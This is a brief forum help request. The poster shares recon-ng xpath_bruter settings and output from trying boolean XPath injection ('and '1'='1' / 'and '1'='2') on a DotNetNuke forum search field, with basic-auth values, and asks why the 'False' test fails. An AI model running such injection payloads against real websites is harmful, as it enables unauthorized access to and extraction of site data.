That video & other witch i find it earlier not help me. here my recon-ng [xpath]> options :
Name Current Value Req Description
---------- ------------- --- -----------
BASE_URL newbielink:http://www.mysite.com/Support/Forum/tabid/49/forumid/3/threadid/2006/scope/posts/Default.aspx?
[nonactive] yes target resource url excluding any parameters
BASIC_PASS abcdefg no password for basic authentication
BASIC_USER slax no username for basic authentication
COOKIE no cookie string containing authenticated session data
PARAMETERS dnn$ctr387$Forum_Container$DNNForum$txtForumSearch=<inject> yes query parameters with '<inject>' signifying the injection
POST True yes set the request method to post. parameters should still be submitted in the url option
STRING Form yes unique string found when the injection results in 'True'
[recon-ng][default][xpath_bruter] > run
- 'True' injection payload: =>' and '1'='1<=
- 'True' injection test passed.
- 'False' injection payload: =>' and '1'='2<=
[!] 'False' injection test failed.
[recon-ng][default][xpath_bruter] >
What i do wrong ?